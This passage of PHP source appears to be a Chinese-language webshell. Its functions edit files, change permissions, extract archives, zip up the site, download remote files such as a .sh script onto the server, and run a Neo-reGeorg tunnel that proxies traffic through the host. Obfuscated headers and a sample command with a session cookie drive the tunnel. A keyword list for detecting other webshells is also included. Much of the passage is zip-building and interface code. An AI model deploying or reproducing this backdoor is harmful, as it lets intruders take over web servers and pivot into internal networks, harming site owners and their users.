HtmlOutput::message('发现目录下有"同名"文件' , 'echo'); } else if (!empty($type) && $type == '3') { $jspath = base64_encode(urlencode($this->p)); $pp = base64_encode(dirname($this->p)); $FILE_TIME = date('Y-m-d H:i:s' , filemtime($this->p)); $FILE_CODE = @file_get_contents($this->p); if (substr(PHP_VERSION , 0 , 1) >= 5) { if (empty($GLOBALS['_GET']['charset'])) { if (self::testUtf8($FILE_CODE) > 1) { $charset = 'UTF-8'; $FILE_CODE = iconv("UTF-8" , "gb2312//IGNORE" , $FILE_CODE); } else { $charset = 'GB2312'; } } else { if ($GLOBALS['_GET']['charset'] == 'GB2312') { $charset = 'GB2312'; } else { $charset = $GLOBALS['_GET']['charset']; $FILE_CODE = iconv($GLOBALS['_GET']['charset'] , "gb2312//IGNORE" , $FILE_CODE); } } } $FILE_CODE = htmlspecialchars($FILE_CODE); } $result .= <<form{width:1100px;padding-right:30px;margin:0 auto;}.top-line{margin-bottom:20px;}.top-line input,.top-line select{margin-right:15px;}.top-line input.sure,.btn-box input{height:40px;border-radius:4px;box-sizing:border-box;width:80px;margin:0;}.btn-box input{height:34px;}textarea{margin-bottom:20px;}select{width:134px;}.btn-box{float:right;margin-top:3px;}.tool input[type=checkbox]{width:20px;height:20px;margin:0;}.tool *{vertical-align:middle;}.tool input[type=text]{margin-right:20px;margin-left:10px;}
END; $result .= HtmlOutput::htmlSelect(["GB2312" => "GB2312" , "UTF-8" => "UTF-8" , "BIG5" => "BIG5" , "EUC-KR" => "EUC-KR" , "EUC-JP" => "EUC-JP" , "SHIFT-JIS" => "SHIFT-JIS" , "WINDOWS-874" => "WINDOWS-874" , "ISO-8859-1" => "ISO-8859-1"] , $charset , "onchange=\"window.location='?action=wjbj&path=$jspath&type=3&charset='+options[selectedIndex].value;\""); $result .= <<
文件修改时间以二进制形式保存文件(建议使用)
END; return $result; } public function testUtf8 ($text) { if (strlen($text) < 3) return false; $lastch = 0; $begin = 0; $BOM = true; $BOMchs = [0xEF , 0xBB , 0xBF]; $good = 0; $bad = 0; $notAscii = 0; for ($i = 0; $i < strlen($text); $i ++) { $ch = ord($text[$i]); if ($begin < 3) { $BOM = ($BOMchs[$begin] == $ch); $begin += 1; continue; } if ($begin == 4 && $BOM) break; if ($ch >= 0x80) $notAscii ++; if (($ch & 0xC0) == 0x80) { if (($lastch & 0xC0) == 0xC0) { $good += 1; } else if (($lastch & 0x80) == 0) { $bad += 1; } } else if (($lastch & 0xC0) == 0xC0) { $bad += 1; } $lastch = $ch; } if ($begin == 4 && $BOM) { return 2; } else if ($notAscii == 0) { return 1; } else if ($good >= $bad) { return 2; } else { return 0; } } public function changePerm () { $result = << form{ width: 500px; margin: 0 auto; padding-right: 50px; } input[type=button]{ height: 40px; padding: 6px 12px; line-height: 1.42857143; color: #555; background-color: #fff; background-image: none; border: 1px solid #ccc; border-radius: 4px; outline: none; vertical-align: middle; width: 100px; cursor: pointer; font-size: 14px; } .btn-box{ margin-top: 30px; text-align: center; } .btn-box input:first-child{ margin-right: 20px; } EOF; $result .= "
" . $this->p . ' 属性为: '; if (is_dir($this->p)) { $result .= HtmlOutput::htmlSelect(["0777" => "0777" , "0755" => "0755" , "0555" => "0555"] , $GLOBALS['_GET']['attr']); } else { $result .= HtmlOutput::htmlSelect(["0666" => "0666" , "0644" => "0644" , "0444" => "0444"] , $GLOBALS['_GET']['attr']); } $result .= "
"; if ($GLOBALS['_POST']['class']) { switch ($GLOBALS['_POST']['class']) { case "0777": $change = @chmod($this->p , 0777); break; case "0755": $change = @chmod($this->p , 0755); break; case "0555": $change = @chmod($this->p , 0555); break; case "0666": $change = @chmod($this->p , 0666); break; case "0644": $change = @chmod($this->p , 0644); break; case "0444": $change = @chmod($this->p , 0444); break; } $content = $change ? $this->msg[4] : $this->msg[5]; $url = "?action=wjdc&path=" . base64_encode(dirname($this->p)); HtmlOutput::tips($content , $url); } $result .= ""; return $result; } public function startUnZip () { $to_dir = Decrypt::run($GLOBALS['_GET']['todir']) . '/'; $zip = new ZipArchive(); if ($zip->open($this->p) !== true) { return '抱歉!压缩包无法打开或损坏'; } $zip->extractTo($to_dir); $zip->close(); return '解压完毕!   进入解压目录   返回'; } public function pack () { $dir = self::getDirArray($this->p); $zip = new DirPack($dir); $out = $zip->out; self::downloadZip($out , $_SERVER['HTTP_HOST'] . ".zip"); } public function remoteDown () { $target_url = isset($GLOBALS['_POST']['target']) ? Decrypt::run($GLOBALS['_POST']['target']) : 'http://website.com/down/file.sh'; $dest_path = isset($GLOBALS['_POST']['dest']) ? Decrypt::run($GLOBALS['_POST']['dest']) : $this->filePathFormat(THEPATH . '/file.sh'); $result = <<function submitUrl(){document.getElementById('target').value=base64encode(document.getElementById('target').value);document.getElementById('dest').value=base64encode(document.getElementById('dest').value);document.getElementById('remote').submit()}
超连接
下载到
END; if ((!empty($GLOBALS['_POST']['target'])) && (!empty($GLOBALS['_POST']['dest']))) { $result .= '
'; $contents = @file_get_contents(Decrypt::run($GLOBALS['_POST']['target'])); if (!$contents) { HtmlOutput::tips('无法读取要下载的数据' , '?action=bsxz'); } else { $content = $this->writeFile(Decrypt::run($GLOBALS['_POST']['dest']) , 'wb' , $contents) ? '下载文件成功' : '下载文件失败'; HtmlOutput::tips($content , '?action=bsxz'); } $result .= '
'; } return $result; } public function webShellScan () { $my_path = str_replace('\\' , '/' , THEPATH); $select = HtmlOutput::htmlSelect(["php" => "PHP" , "asp" => "ASP" , "aspx" => "ASPX" , "jsp" => "JSP"]); $result = <<.dir-box{width:700px;padding-right:50px;margin:0 auto;}.dir{position:relative;color:#333;font-size:18px;margin-bottom:20px;}.find-file{margin-top:50px;}.dir-box input[type=text]{margin-left:30px;width:595px;}.dir select{margin-left:30px;width:80px;}.dir input[type=submit]{float:right;}table{margin:0 auto;width:700px;border-spacing:0;border-collapse:collapse;}tr:hover{background:#f5f5f5;}tr:nth-child(even){background:#f9f9f9;}td{border:1px solid #ededed;padding:12px 20px;}td a{display:inline-block;width:100%;height:100%;text-align:center;color:#666;}td a:hover{text-decoration:underline;}.edit{color:#9dd69f;}.delete{color:#d46464;}
查找功能基于关键字实现,删除功能请谨慎使用
查找范围
脚本类型$select
EOF; if (!empty($GLOBALS['_POST']['path'])) { $result .= "
找到文件:
文件路径文件属性($current_user)用户|组修改时间文件大小操作
$dirs$perm$dir_owner:$dir_group$filetime改名删除打包
$files$perm$file_owner:$file_group$filetime$fsize EOF; if (($it == '.gz') or ($it == 'zip') or ($it == 'tar') or ($it == '.7z')) $result .= '解压'; else $result .= '编辑'; $result .= <<改名删除复制下载
"; $show = $this->getDirArray(Decrypt::run($GLOBALS['_POST']['path'])); foreach ($show as $files) { $file_info = pathinfo($files); if ($file_info['extension'] == $GLOBALS['_POST']['class']) { $file_code = @file_get_contents($files); if ($this->scanFile($file_code , $GLOBALS['_POST']['class'])) { $files_2 = base64_encode($files); $result .= <<$files EOF; } } } } return $result; } public function scanFile ($file_code , $file_type) { $dim = [ "php" => ["eval(" , "exec("] , "asp" => ["WScript.Shell" , "execute(" , "createtextfile("] , "aspx" => ["Response.Write(eval(" , "RunCMD(" , "CreateText()"] , "jsp" => ["runtime.exec("] , ]; foreach ($dim[$file_type] as $code) { if (stristr($file_code , $code)) return true; } } } class DirPack { var $out = ''; function __construct ($dir) { if (@function_exists('gzcompress')) { if (count($dir) > 0) { foreach ($dir as $file) { if (is_file($file)) { $filecode = file_get_contents($file); if (is_array($dir)) $file = basename($file); $this->fileZip($filecode , $file); } } $this->out = $this->packFile(); } return true; } else return false; } var $datasec = []; var $ctrl_dir = []; var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function at ($atunix = 0) { $unixarr = ($atunix == 0) ? getdate() : getdate($atunix); if ($unixarr['year'] < 1980) { $unixarr['year'] = 1980; $unixarr['mon'] = 1; $unixarr['mday'] = 1; $unixarr['hours'] = 0; $unixarr['minutes'] = 0; $unixarr['seconds'] = 0; } return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) | ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1); } function fileZip ($data , $name , $time = 0) { $name = str_replace('\\' , '/' , $name); $dtime = dechex($this->at($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; $fr .= "\x00\x00"; $fr .= "\x08\x00"; $fr .= $hexdtime; $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata , 0 , strlen($zdata) - 4) , 2); $fr .= pack('V' , $crc); $fr .= pack('V' , $c_len); $fr .= pack('V' , $unc_len); $fr .= pack('v' , strlen($name)); $fr .= pack('v' , 0); $fr .= $name; $fr .= $zdata; $fr .= pack('V' , $crc); $fr .= pack('V' , $c_len); $fr .= pack('V' , $unc_len); $this->datasec[] = $fr; $new_offset = strlen(implode('' , $this->datasec)); $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; $cdrec .= "\x14\x00"; $cdrec .= "\x00\x00"; $cdrec .= "\x08\x00"; $cdrec .= $hexdtime; $cdrec .= pack('V' , $crc); $cdrec .= pack('V' , $c_len); $cdrec .= pack('V' , $unc_len); $cdrec .= pack('v' , strlen($name)); $cdrec .= pack('v' , 0); $cdrec .= pack('v' , 0); $cdrec .= pack('v' , 0); $cdrec .= pack('v' , 0); $cdrec .= pack('V' , 32); $cdrec .= pack('V' , $this->old_offset); $this->old_offset = $new_offset; $cdrec .= $name; $this->ctrl_dir[] = $cdrec; } function packFile () { $data = implode('' , $this->datasec); $ctrldir = implode('' , $this->ctrl_dir); return $data . $ctrldir . $this->eof_ctrl_dir . pack('v' , sizeof($this->ctrl_dir)) . pack('v' , sizeof($this->ctrl_dir)) . pack('V' , strlen($ctrldir)) . pack('V' , strlen($data)) . "\x00\x00"; } } class PhpZip { var $file_count = 0; var $datastr_len = 0; var $dirstr_len = 0; var $filedata = ''; var $gzfilename; var $fp; var $dirstr = ''; function unix2DosTime ($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function startFile ($path = "web.zip") { $this->gzfilename = $path; $mypathdir = []; do { $mypathdir[] = $path = dirname($path); } while ($path != '.'); @end($mypathdir); do { $path = @current($mypathdir); @mkdir($path); } while (@prev($mypathdir)); if ($this->fp = @fopen($this->gzfilename , "w")) { return true; } return false; } function addFile ($data , $name) { $name = str_replace('\\' , '/' , $name); if (strrchr($name , '/') == '/') return $this->addDir($name); $dtime = dechex($this->unix2DosTime()); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '";'); $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata , 0 , strlen($zdata) - 4) , 2); $datastr = "\x50\x4b\x03\x04"; $datastr .= "\x14\x00"; $datastr .= "\x00\x00"; $datastr .= "\x08\x00"; $datastr .= $hexdtime; $datastr .= pack('V' , $crc); $datastr .= pack('V' , $c_len); $datastr .= pack('V' , $unc_len); $datastr .= pack('v' , strlen($name)); $datastr .= pack('v' , 0); $datastr .= $name; $datastr .= $zdata; $datastr .= pack('V' , $crc); $datastr .= pack('V' , $c_len); $datastr .= pack('V' , $unc_len); fwrite($this->fp , $datastr); $my_datastr_len = strlen($datastr); unset($datastr); $dirstr = "\x50\x4b\x01\x02"; $dirstr .= "\x00\x00"; $dirstr .= "\x14\x00"; $dirstr .= "\x00\x00"; $dirstr .= "\x08\x00"; $dirstr .= $hexdtime; $dirstr .= pack('V' , $crc); $dirstr .= pack('V' , $c_len); $dirstr .= pack('V' , $unc_len); $dirstr .= pack('v' , strlen($name)); $dirstr .= pack('v' , 0); $dirstr .= pack('v' , 0); $dirstr .= pack('v' , 0); $dirstr .= pack('v' , 0); $dirstr .= pack('V' , 32); $dirstr .= pack('V' , $this->datastr_len); $dirstr .= $name; $this->dirstr .= $dirstr; $this->file_count ++; $this->dirstr_len += strlen($dirstr); $this->datastr_len += $my_datastr_len; } function addDir ($name) { $name = str_replace("\\" , "/" , $name); $datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $datastr .= pack("V" , 0) . pack("V" , 0) . pack("V" , 0) . pack("v" , strlen($name)); $datastr .= pack("v" , 0) . $name . pack("V" , 0) . pack("V" , 0) . pack("V" , 0); fwrite($this->fp , $datastr); $my_datastr_len = strlen($datastr); unset($datastr); $dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; $dirstr .= pack("V" , 0) . pack("V" , 0) . pack("V" , 0) . pack("v" , strlen($name)); $dirstr .= pack("v" , 0) . pack("v" , 0) . pack("v" , 0) . pack("v" , 0); $dirstr .= pack("V" , 16) . pack("V" , $this->datastr_len) . $name; $this->dirstr .= $dirstr; $this->file_count ++; $this->dirstr_len += strlen($dirstr); $this->datastr_len += $my_datastr_len; } function createFile () { $endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" . pack('v' , $this->file_count) . pack('v' , $this->file_count) . pack('V' , $this->dirstr_len) . pack('V' , $this->datastr_len) . "\x00\x00"; fwrite($this->fp , $this->dirstr . $endstr); fclose($this->fp); } } class NeoReg { public function __construct () { ini_set("allow_url_fopen" , true); ini_set("allow_url_include" , true); } public function html () { $result = <<.sug-box{width:700px;padding-right:50px;margin:0 auto;}.sug{font-size:18px;color:#333;line-height:30px;margin-bottom:30px;}.sug a{font-size:17px;color:#9dd69f;}.sug a:hover{text-decoration:underline;}.sug-content{color:#666;font-size:18px;line-height:30px;}.active{display:block;margin-top:10px;background-color:#f8f8f8;padding:10px 20px;color:#666;margin-bottom:30px;border-radius:4px;border:1px solid #ccc;}
本功能提供socket代理服务,模块基于Neo-reGeorg
是一个在 regeorg 基础上重构的 socket 代理服务
使用方法:
python3 noereg.py -k reg3uVMc -u http://website.com/script.php?action=socket --cookie "PHPSESSIDS=5dce171e2fab0814d67170153804f937" --skip -p 33344
开启Python端服务后,会在本地启动一个监听端口,此时使用代理软件将流量代理至本地端口即可,包括但不限于proxychains、proxifier、浏览器代理插件、抓包软件的上行代理等
更多使用方法请前往 Neo-reGeorg 项目查看
EOF; return $result; } public function start () { if (!function_exists('apache_request_headers')) { function apache_request_headers () { $arh = []; $rx_http = '/\AHTTP_/'; foreach ($_SERVER as $key => $val) { if (preg_match($rx_http , $key)) { $arh_key = preg_replace($rx_http , '' , $key); $rx_matches = []; $rx_matches = explode('_' , $arh_key); if (count($rx_matches) > 0 and strlen($arh_key) > 2) { foreach ($rx_matches as $ak_key => $ak_val) { $rx_matches[$ak_key] = ucfirst($ak_val); } $arh_key = implode('-' , $rx_matches); } $arh[$arh_key] = $val; } } return ($arh); } } if ($_SERVER['REQUEST_METHOD'] === 'GET') exit(""); if ($_SERVER['REQUEST_METHOD'] === 'POST') { set_time_limit(0); $headers = apache_request_headers(); $cmd = $headers["Lmzqtak"]; $en = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; $de = "vrWgLQJuZ3k2lBD481imxPpofeENIFcVTHSqzy6/7KtY5whs0b9RjManGCXd+UOA"; switch ($cmd) { case "FwWT1ocVC83kykxLLy3bzBVPtTwBVB4r91SkvtN25Wm3nI1Bfv876wsulwsa1AUP4": { $target_ary = preg_split("/\|/" , Decrypt::run(strtr($headers["Ibfszbhyzd"] , $de , $en)) , 2); $target = $target_ary[0]; $port = (int) $target_ary[1]; $res = fsockopen($target , $port); if ($res === false) { header('Krqfmtouwpyrwfaf: W4lBVjY4z77aSe7l42VjnfpJ43TMOKnZF_w9x6PwlSie62nlMbF2BjjtrdX9kJKjL'); header('Djsbchdkjmarmdc: gZkxwb0WUg2r9d0acZFTz2FyJgcOsFoi0'); return; } stream_set_blocking($res , false); @session_start(); $_SESSION["run"] = true; $_SESSION["writebuf"] = ""; $_SESSION["readbuf"] = ""; ob_end_clean(); header('Krqfmtouwpyrwfaf: MWJ7HG75eyrO_glcliIxcf3xqCIqdI'); header("Connection: close"); ignore_user_abort(); ob_start(); $size = ob_get_length(); header("Content-Length: $size"); ob_end_flush(); flush(); session_write_close(); while ($_SESSION["run"]) { $readBuff = ""; @session_start(); $writeBuff = $_SESSION["writebuf"]; $_SESSION["writebuf"] = ""; session_write_close(); if ($writeBuff != "") { stream_set_blocking($res , false); $i = fwrite($res , $writeBuff); if ($i === false) { @session_start(); $_SESSION["run"] = false; session_write_close(); header('Krqfmtouwpyrwfaf: W4lBVjY4z77aSe7l42VjnfpJ43TMOKnZF_w9x6PwlSie62nlMbF2BjjtrdX9kJKjL'); header('Djsbchdkjmarmdc: i8rwYaysPsUrhuJxLbGlUm_sgUEvK_1Ehs1mQ64C1ZyMnCj2qdxVz1iRfDjQWik'); } } stream_set_blocking($res , false); while ($o = fgets($res , 10)) { if ($o === false) { @session_start(); $_SESSION["run"] = false; session_write_close(); header('Krqfmtouwpyrwfaf: W4lBVjY4z77aSe7l42VjnfpJ43TMOKnZF_w9x6PwlSie62nlMbF2BjjtrdX9kJKjL'); header('Djsbchdkjmarmdc: ICbkCsGKF5'); } $readBuff .= $o; } if ($readBuff != "") { @session_start(); $_SESSION["readbuf"] .= $readBuff; session_write_close(); } } fclose($res); } break; case "r19gUFUEKq8DFpZViKDuNYx8": { error_log("DisConnect recieved"); @session_start(); $_SESSION["run"] = false; session_write_close(); return; } break; case "O3BcQJ7qeCFV44Xnuif6LDMQ29nEBbYY3Sfc2OXPnoBmB7AwO_KgDXKwTCnedms": { @session_start(); $readBuffer = $_SESSION["readbuf"]; $_SESSION["readbuf"] = ""; $running = $_SESSION["run"]; session_write_close(); if ($running) { header('Krqfmtouwpyrwfaf: MWJ7HG75eyrO_glcliIxcf3xqCIqdI'); header("Connection: Keep-Alive"); echo strtr(base64_encode($readBuffer) , $en , $de); return; } else { header('Krqfmtouwpyrwfaf: W4lBVjY4z77aSe7l42VjnfpJ43TMOKnZF_w9x6PwlSie62nlMbF2BjjtrdX9kJKjL'); return; } } break; case "nYBUn8kfSa2w1cYsERlwWN_AjaUFyqrcWVKbi": { @session_start(); $running = $_SESSION["run"]; session_write_close(); if (!$running) { header('Krqfmtouwpyrwfaf: W4lBVjY4z77aSe7l42VjnfpJ43TMOKnZF_w9x6PwlSie62nlMbF2BjjtrdX9kJKjL'); header('Djsbchdkjmarmdc: kZI3KBool1XlLCGCJ94ZPg0DnEcavGjvsj7hCICwbFCRfFMRaoL'); return; } header('Content-Type: application/octet-stream'); $rawPostData = file_get_contents(StringHandler::getWatermalen()); if ($rawPostData) { @session_start(); $_SESSION["writebuf"] .= Decrypt::run(strtr($rawPostData , $de , $en)); session_write_close(); header('Krqfmtouwpyrwfaf: MWJ7HG75eyrO_glcliIxcf3xqCIqdI'); header("Connection: Keep-Alive"); return; } else { header('Krqfmtouwpyrwfaf: W4lBVjY4z77aSe7l42VjnfpJ43TMOKnZF_w9x6PwlSie62nlMbF2BjjtrdX9kJKjL'); header('Djsbchdkjmarmdc: NabOAGtNbnyCcHU3jHnnnFCJz'); } } break; } } } } class Decrypt { public static function run ($data) { return base64_decode($data); } } ob_start(); $main_handler = new Main(); $main_handler->mainLogin(); ob_end_flush();
编辑删除